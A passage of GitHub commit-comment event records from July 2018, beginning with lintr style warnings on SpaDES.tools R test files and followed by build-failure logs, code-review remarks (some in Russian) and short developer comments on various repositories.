biomass=rnbinom(length(uniqueComms), mu = 4000, 0.4)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:73:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/tests/testthat/test-mapReduce.R#L73) *style:* **Commented code should be removed.**\n```r\n​#   biomass <- rasterizeReduced(reducedDT, fullRas, \"biomass\")\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:75:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/tests/testthat/test-mapReduce.R#L75) *style:* **Commented code should be removed.**\n```r\n​#   setkey(reducedDT, biomass)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:76:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/tests/testthat/test-mapReduce.R#L76) *style:* **Commented code should be removed.**\n```r\n​#   communities <- rasterizeReduced(reducedDT, fullRas, \"communities\")\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:77:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/tests/testthat/test-mapReduce.R#L77) *style:* **Commented code should be removed.**\n```r\n​#   expect_equal(sort(unique(getValues(communities))), sort(reducedDT$communities))\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:81:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/tests/testthat/test-mapReduce.R#L81) *style:* **Commented code should be removed.**\n```r\n​#   library(data.table)\n    ^~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:82:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/tests/testthat/test-mapReduce.R#L82) *style:* **Commented code should be removed.**\n```r\n​#   library(raster)\n    ^~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:85:6:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/tests/testthat/test-mapReduce.R#L85) *style:* **Commented code should be removed.**\n```r\n​#    detach(\"package:data.table\")\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:89:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/tests/testthat/test-mapReduce.R#L89) *style:* **Commented code should be removed.**\n```r\n​#   ras <- raster(extent(0,15,0,15), res=1)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:90:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/tests/testthat/test-mapReduce.R#L90) *style:* **Commented code should be removed.**\n```r\n​#   fullRas <- randomPolygons(ras, numTypes=5, speedup=1, p=0.3)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:91:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/tests/testthat/test-mapReduce.R#L91) *style:* **Commented code should be removed.**\n```r\n​#   names(fullRas) <- \"mapcodeAll\"\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:92:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/tests/testthat/test-mapReduce.R#L92) *style:* **Commented code should be removed.**\n```r\n​#   uniqueComms <- raster::unique(fullRas)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:96:7:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/tests/testthat/test-mapReduce.R#L96) *style:* **Commented code should be removed.**\n```r\n​#     biomass=rnbinom(length(uniqueComms), mu=4000, 0.4)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:98:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/tests/testthat/test-mapReduce.R#L98) *style:* **Commented code should be removed.**\n```r\n​#   biomass <- rasterizeReduced(reducedDT, fullRas, \"biomass\")\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:100:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/tests/testthat/test-mapReduce.R#L100) *style:* **Commented code should be removed.**\n```r\n​#   setkey(reducedDT, biomass)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:101:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/tests/testthat/test-mapReduce.R#L101) *style:* **Commented code should be removed.**\n```r\n​#   communities <- rasterizeReduced(reducedDT, fullRas, \"communities\")\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:102:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/tests/testthat/test-mapReduce.R#L102) *style:* **Commented code should be removed.**\n```r\n​#   expect_equal(length(unique(getValues(communities))), length(unique(getValues(fullRas))))\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-randomPolygon.R:25:60:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/tests/testthat/test-randomPolygon.R#L25) *style:* **Put spaces around all infix operators.**\n```r\n​  expect_true(base::abs(base::abs(polyArea - area)) <  area/4) ## TODO: why is this area/4?\n                                                          ~^~\n```\n[tests/testthat/test-splitRaster.R:148:38:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/tests/testthat/test-splitRaster.R#L148) *style:* **Commas should always have a space after.**\n```r\n​  expect_identical(dataType(y4[[1]]),\"INT1U\")\n                                     ^\n```\n[tests/testthat/test-splitRaster.R:165:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/tests/testthat/test-splitRaster.R#L165) *style:* **Lines should not be more than 100 characters.**\n```r\n​    tmpdir <- file.path(tempdir(), \"splitRaster-test-parallel\") %>% reproducible::checkPath(create = TRUE)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-splitRaster.R:168:8:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/tests/testthat/test-splitRaster.R#L168) *style:* **Commented code should be removed.**\n```r\n​      #detach(\"package:raster\")\n       ^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-splitRaster.R:226:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/tests/testthat/test-splitRaster.R#L226) *style:* **Lines should not be more than 100 characters.**\n```r\n​  tmpdir <- file.path(tempdir(), \"splitRaster-test-large\") %>% reproducible::checkPath(create = TRUE)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-splitRaster.R:264:4:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/tests/testthat/test-splitRaster.R#L264) *style:* **Commented code should be removed.**\n```r\n​  #expect_equal(min(values(m)), min(values(r))) ## Error: cannot allocate vector of size 4.8 Gb\n   ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-splitRaster.R:283:4:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/tests/testthat/test-splitRaster.R#L283) *style:* **Commented code should be removed.**\n```r\n​  #expect_equal(max(values(m1)), max(values(r)))\n   ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-splitRaster.R:284:4:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/tests/testthat/test-splitRaster.R#L284) *style:* **Commented code should be removed.**\n```r\n​  #expect_equal(min(values(m1)), min(values(r)))\n   ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread.R:209:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/tests/testthat/test-spread.R#L209) *style:* **Lines should not be more than 100 characters.**\n```r\n​    if (interactive()) Plot(circEdge, addTo = \"circs\", cols = c(\"transparent\", rainbow(numCircs)[whCirc]))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:148:4:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/tests/testthat/test-spread2.R#L148) *style:* **Commented code should be removed.**\n```r\n​  #quickDT <- data.table(id = seq_along(sams), initialPixels = sams, key = \"id\")\n   ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:150:4:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/tests/testthat/test-spread2.R#L150) *style:* **Commented code should be removed.**\n```r\n​  #cirOut <- quickDT[cirOut, on = ]\n   ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:473:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/tests/testthat/test-spread2.R#L473) *style:* **Lines should not be more than 100 characters.**\n```r\n​  ##                                    expr       min        lq      mean   median        uq       max neval\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:474:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/tests/testthat/test-spread2.R#L474) *style:* **Lines should not be more than 100 characters.**\n```r\n​  ##         iterativeFun(ras, FALSE, n, sp)  3.096979 12.642477  73.02248 35.17520  91.10528  764.4073   300\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:475:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/tests/testthat/test-spread2.R#L475) *style:* **Lines should not be more than 100 characters.**\n```r\n​  ##      nonIterativeFun(ras, FALSE, n, sp)  1.509484  6.555565  31.18444 14.91066  42.78317  158.5237   300\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:476:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/tests/testthat/test-spread2.R#L476) *style:* **Lines should not be more than 100 characters.**\n```r\n​  ##           origSpread(ras, FALSE, n, sp)  5.154006  7.555631  14.87158 11.49005  17.50599  231.5487   300\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:477:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/tests/testthat/test-spread2.R#L477) *style:* **Lines should not be more than 100 characters.**\n```r\n​  ## origSpreadIterations(ras, FALSE, n, sp) 10.754669 51.524368 141.48620 93.61996 169.10808 2110.2683   300\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:688:38:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/tests/testthat/test-spread2.R#L688) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  ciCentre[seq_len(ncell(ciCentre))[-(ncell(ciCentre) / 2 - ncol(ciCentre) / 2)]] <- NA_integer_\n                                     ^\n```\n[tests/testthat/test-spread2.R:884:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/tests/testthat/test-spread2.R#L884) *style:* **Lines should not be more than 100 characters.**\n```r\n​                       spreadProb = 0.23, persistProb = 0, iterations = 10, directions = 8L, plot.it = FALSE)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:886:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/tests/testthat/test-spread2.R#L886) *style:* **Lines should not be more than 100 characters.**\n```r\n​                      spreadProb = 0.23, persistProb = 0.8, iterations = 10, directions = 8L, plot.it = FALSE)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:891:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/tests/testthat/test-spread2.R#L891) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  M <- matrix(0.8, nrow = 50, ncol = 50)\n  ^\n```\n[tests/testthat/test-spread2.R:898:35:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/tests/testthat/test-spread2.R#L898) *style:* **Put spaces around all infix operators.**\n```r\n​  start <- c(50, length(landscape)-49)\n                                 ~^~\n```\n[tests/testthat/test-spread2.R:902:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/tests/testthat/test-spread2.R#L902) *style:* **Lines should not be more than 100 characters.**\n```r\n​                        spreadProb = 0.23, persistProb = persistRas, iterations = 10, directions = 8L,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:916:14:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/tests/testthat/test-spread2.R#L916) *style:* **Use <-, not =, for assignment.**\n```r\n​  spreadProb = landscape\n             ^\n```\n[tests/testthat/test-spread2.R:918:72:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/tests/testthat/test-spread2.R#L918) *style:* **Commas should always have a space after.**\n```r\n​  expect_silent(spread2(landscape = landscape, spreadProb = spreadProb,start = start,\n                                                                       ^\n```"}},"created_at":"2018-07-05T20:09:13Z"}
{"id":"7925315530","type":"CommitCommentEvent","actor":{"login":"etaylor8086"},"repo":{"name":"etaylor8086/prime-randomizer-web"},"payload":{"comment":{"id":29613031,"position":null,"line":null,"path":null,"commit_id":"ed5d9bf13267802f48a93b979b7eea3d73241597","created_at":"2018-07-05T20:10:16Z","updated_at":"2018-07-05T20:10:16Z","author_association":"OWNER","body":"I forgot to mention, this fixes #2 "}},"created_at":"2018-07-05T20:10:16Z"}
{"id":"7925316363","type":"CommitCommentEvent","actor":{"login":"Ceridan"},"repo":{"name":"dodopizza/restaurantboard-public"},"payload":{"comment":{"id":29613032,"position":41,"line":64,"path":"Dodo.Core.UnitTests/DomainModel/Departments/Units/PizzeriaTests.cs","commit_id":"2d3b8f5b3c692e8bb0ad641a3d7b6214e5b5dca0","created_at":"2018-07-05T20:10:27Z","updated_at":"2018-07-05T20:10:27Z","author_association":"NONE","body":"Это самые сложные тесты из всех из-за названий. Мы правда думали над этим и текущий вариант нам тоже не очень, но как-то не смогли придумать лучше. Причем наличие тут двух тестов на меньше года и больше года не случайно. Мы сначала написали один и нашли баг в самом коде. Поэтому написали второй и собственно еще во втором задании поправили баг, который некорректно считал месяцы для пиццерий до года.\r\n"}},"created_at":"2018-07-05T20:10:27Z"}
{"id":"7925320406","type":"CommitCommentEvent","actor":{"login":"steklHonza"},"repo":{"name":"steklHonza/java"},"payload":{"comment":{"id":29613046,"position":null,"line":null,"path":null,"commit_id":"02ce554f9f13d342b08db13a7c4c222162f83581","created_at":"2018-07-05T20:11:23Z","updated_at":"2018-07-05T20:11:23Z","author_association":"OWNER","body":"Java constructor example"}},"created_at":"2018-07-05T20:11:23Z"}
{"id":"7925326625","type":"CommitCommentEvent","actor":{"login":"daid"},"repo":{"name":"daid/Fuseblaze"},"payload":{"comment":{"id":29613058,"position":null,"line":null,"path":null,"commit_id":"913513efb7e0740a45c4922f922f59c9e9a2f3d8","created_at":"2018-07-05T20:12:49Z","updated_at":"2018-07-05T20:12:49Z","author_association":"OWNER","body":"TinyCI build failure:\n[make] returned [2]:\n```[ 28%] Built target sp2freetype\n[ 29%] Built target json11\n[ 39%] Built target box2d\n[ 39%] Built target glew\n[ 45%] Built target lua\n[ 76%] Built target bullet\n[ 76%] Building CXX object CMakeFiles/Fuseblaze.dir/src/blood.cpp.o\nCMakeFiles/Fuseblaze.dir/build.make:62: recipe for target 'CMakeFiles/Fuseblaze.dir/src/blood.cpp.o' failed\nCMakeFiles/Makefile2:220: recipe for target 'CMakeFiles/Fuseblaze.dir/all' failed\nMakefile:83: recipe for target 'all' failed\n\n/home/daid/_tinyci/daid/Fuseblaze/src/blood.cpp:5:35: fatal error: sp2/graphics/meshData.h: No such file or directory\n #include <sp2/graphics/meshData.h>\n                                   ^\ncompilation terminated.\nmake[2]: *** [CMakeFiles/Fuseblaze.dir/src/blood.cpp.o] Error 1\nmake[1]: *** [CMakeFiles/Fuseblaze.dir/all] Error 2\nmake: *** [all] Error 2\n```"}},"created_at":"2018-07-05T20:12:49Z"}
{"id":"7925326660","type":"CommitCommentEvent","actor":{"login":"CommanderMark"},"repo":{"name":"ENDSHN/scpcb"},"payload":{"comment":{"id":29613059,"position":24,"line":7314,"path":"UpdateEvents.bb","commit_id":"b2bb14fb919e2b170dee8fa1f721ab167de60f2d","created_at":"2018-07-05T20:12:49Z","updated_at":"2018-07-05T20:12:49Z","author_association":"NONE","body":"Pretty sure this is a memory leak. It's never freed after this."}},"created_at":"2018-07-05T20:12:49Z"}
{"id":"7925329605","type":"CommitCommentEvent","actor":{"login":"virtuald"},"repo":{"name":"exaile/exaile"},"payload":{"comment":{"id":29613064,"position":null,"line":null,"path":null,"commit_id":"d0cee09439db9386145cd872c6fed0933188b57b","created_at":"2018-07-05T20:13:28Z","updated_at":"2018-07-05T20:13:28Z","author_association":"CONTRIBUTOR","body":"Oops. :("}},"created_at":"2018-07-05T20:13:28Z"}
{"id":"7925333410","type":"CommitCommentEvent","actor":{"login":"daid"},"repo":{"name":"daid/Fuseblaze"},"payload":{"comment":{"id":29613068,"position":null,"line":null,"path":null,"commit_id":"913513efb7e0740a45c4922f922f59c9e9a2f3d8","created_at":"2018-07-05T20:14:22Z","updated_at":"2018-07-05T20:14:22Z","author_association":"OWNER","body":"TinyCI build failure:\n[make -j 3] returned [2]:\n```[  1%] Built target json11\n[ 11%] Built target box2d\n[ 11%] Built target glew\n[ 39%] Built target sp2freetype\n[ 45%] Built target lua\n[ 76%] Built target bullet\n[ 76%] Building CXX object CMakeFiles/Fuseblaze.dir/src/editor/editorHandle.cpp.o\n[ 76%] Building CXX object CMakeFiles/Fuseblaze.dir/src/blood.cpp.o\n[ 76%] Building CXX object CMakeFiles/Fuseblaze.dir/src/editor/editor.cpp.o\nCMakeFiles/Fuseblaze.dir/build.make:62: recipe for target 'CMakeFiles/Fuseblaze.dir/src/blood.cpp.o' failed\nCMakeFiles/Makefile2:220: recipe for target 'CMakeFiles/Fuseblaze.dir/all' failed\nMakefile:83: recipe for target 'all' failed\n\n/home/daid/_tinyci/daid/Fuseblaze/src/blood.cpp:5:35: fatal error: sp2/graphics/meshData.h: No such file or directory\n #include <sp2/graphics/meshData.h>\n                                   ^\ncompilation terminated.\nmake[2]: *** [CMakeFiles/Fuseblaze.dir/src/blood.cpp.o] Error 1\nmake[2]: *** Waiting for unfinished jobs....\n/home/daid/_tinyci/daid/Fuseblaze/src/editor/editor.cpp: In member function 'sp::Vector2d Editor::toWorld(sp::Vector2d)':\n/home/daid/_tinyci/daid/Fuseblaze/src/editor/editor.cpp:159:1: warning: no return statement in function returning non-void [-Wreturn-type]\n }\n ^\nmake[1]: *** [CMakeFiles/Fuseblaze.dir/all] Error 2\nmake: *** [all] Error 2\n```"}},"created_at":"2018-07-05T20:14:22Z"}
{"id":"7925335769","type":"CommitCommentEvent","actor":{"login":"bevzuk"},"repo":{"name":"dodopizza/restaurantboard-public"},"payload":{"comment":{"id":29613071,"position":5,"line":9,"path":"Dodo.RestaurantBoard.Tests/OrganizationTests.cs","commit_id":"762f7bba22f72419a56616c3a8a7c4a5bdab6426","created_at":"2018-07-05T20:14:54Z","updated_at":"2018-07-05T20:14:54Z","author_association":"MEMBER","body":"1. Это не OrganizationTests\r\n2. Сложное, длинное и непонятное название теста. Попробуйте написать по-русски, как ведет себя этот код при заданных условиях. Потом тупо переведите на английский."}},"created_at":"2018-07-05T20:14:54Z"}
{"id":"7925341094","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29613085,"position":245,"line":218,"path":"examples_tests/28.Benchmark/main.cpp","commit_id":"bd417b85e3efd7710a5b4bcf18bfec232c7b2e44","created_at":"2018-07-05T20:16:01Z","updated_at":"2018-07-05T20:16:01Z","author_association":"NONE","body":"`&& !DONT_UPDATE_BUFFER`"}},"created_at":"2018-07-05T20:16:01Z"}
{"id":"7925342996","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29613087,"position":195,"line":172,"path":"examples_tests/28.Benchmark/main.cpp","commit_id":"bd417b85e3efd7710a5b4bcf18bfec232c7b2e44","created_at":"2018-07-05T20:16:27Z","updated_at":"2018-07-05T20:16:27Z","author_association":"NONE","body":"get rid of this memset"}},"created_at":"2018-07-05T20:16:27Z"}
{"id":"7925349818","type":"CommitCommentEvent","actor":{"login":"kotarubhargavi"},"repo":{"name":"kotarubhargavi/servicenow"},"payload":{"comment":{"id":29613101,"position":null,"line":null,"path":null,"commit_id":"031e0fe98830cf6b04726f89b347dfb5c0733b4b","created_at":"2018-07-05T20:18:00Z","updated_at":"2018-07-05T20:18:00Z","author_association":"OWNER","body":"hm"}},"created_at":"2018-07-05T20:18:00Z"}
{"id":"7925350978","type":"CommitCommentEvent","actor":{"login":"bevzuk"},"repo":{"name":"dodopizza/restaurantboard-public"},"payload":{"comment":{"id":29613102,"position":5,"line":38,"path":"Dodo.RestaurantBoard.Tests/CallCenterTests.cs","commit_id":"762f7bba22f72419a56616c3a8a7c4a5bdab6426","created_at":"2018-07-05T20:18:16Z","updated_at":"2018-07-05T20:18:16Z","author_association":"MEMBER","body":"Заинлайньте константы, они мешают читать тест.\r\nНеужели не проще назвать как-нибудь типа\r\n`GetCallCenterPhoneFromXml_WithPhone_ExtractsPhoneNumber`"}},"created_at":"2018-07-05T20:18:16Z"}
{"id":"7925352540","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29613106,"position":null,"line":null,"path":null,"commit_id":"351e7f60e093f1a72c8267ac982daa723715980a","created_at":"2018-07-05T20:18:37Z","updated_at":"2018-07-05T20:18:37Z","author_association":"COLLABORATOR","body":"🔥 [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios-device-tests/7/display/redirect) (on internal Jenkins) failed in stage 'Publish builds to GitHub' 🔥 : hudson.AbortException: No item named ../macios-device-tests found\n\n✅ [Build succeeded](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios-device-tests/7//console)\n"}},"created_at":"2018-07-05T20:18:37Z"}
{"id":"7925353464","type":"CommitCommentEvent","actor":{"login":"daid"},"repo":{"name":"daid/Fuseblaze"},"payload":{"comment":{"id":29613108,"position":null,"line":null,"path":null,"commit_id":"d25c83e95d92bb0281c03b2e8e1b0bef7a22604d","created_at":"2018-07-05T20:18:50Z","updated_at":"2018-07-05T20:18:50Z","author_association":"OWNER","body":"@daid TinyCI build failure:\n[make -j 3] returned [2]:\n```[  1%] Built target json11\n[ 11%] Built target box2d\n[ 11%] Built target glew\n[ 39%] Built target sp2freetype\n[ 45%] Built target lua\n[ 76%] Built target bullet\nScanning dependencies of target Fuseblaze\n[ 76%] Building CXX object CMakeFiles/Fuseblaze.dir/src/blood.cpp.o\n[ 77%] Building CXX object CMakeFiles/Fuseblaze.dir/src/editor/prototype.cpp.o\n[ 77%] Building CXX object CMakeFiles/Fuseblaze.dir/src/effect.cpp.o\nCMakeFiles/Fuseblaze.dir/build.make:158: recipe for target 'CMakeFiles/Fuseblaze.dir/src/effect.cpp.o' failed\nCMakeFiles/Makefile2:220: recipe for target 'CMakeFiles/Fuseblaze.dir/all' failed\nMakefile:83: recipe for target 'all' failed\n\n/home/daid/_tinyci/daid/Fuseblaze/src/effect.cpp:4:35: fatal error: sp2/graphics/meshData.h: No such file or directory\n #include <sp2/graphics/meshData.h>\n                                   ^\ncompilation terminated.\nmake[2]: *** [CMakeFiles/Fuseblaze.dir/src/effect.cpp.o] Error 1\nmake[2]: *** Waiting for unfinished jobs....\nmake[1]: *** [CMakeFiles/Fuseblaze.dir/all] Error 2\nmake: *** [all] Error 2\n```"}},"created_at":"2018-07-05T20:18:50Z"}
{"id":"7925354529","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29613111,"position":199,"line":173,"path":"examples_tests/28.Benchmark/main.cpp","commit_id":"bd417b85e3efd7710a5b4bcf18bfec232c7b2e44","created_at":"2018-07-05T20:19:07Z","updated_at":"2018-07-05T20:19:07Z","author_association":"NONE","body":"wrap this whole block of #ifdefs in `if !DONT_UPDATE_BUFFER`"}},"created_at":"2018-07-05T20:19:07Z"}
{"id":"7925355303","type":"CommitCommentEvent","actor":{"login":"Teyler7"},"repo":{"name":"kelvintaywl/dentist.js"},"payload":{"comment":{"id":29613116,"position":null,"line":null,"path":null,"commit_id":"af2821f2eef8f7d3008017f0175be2e626b3ee82","created_at":"2018-07-05T20:19:17Z","updated_at":"2018-07-05T20:19:17Z","author_association":"NONE","body":"Go @matthewnitschke 🎉 "}},"created_at":"2018-07-05T20:19:17Z"}
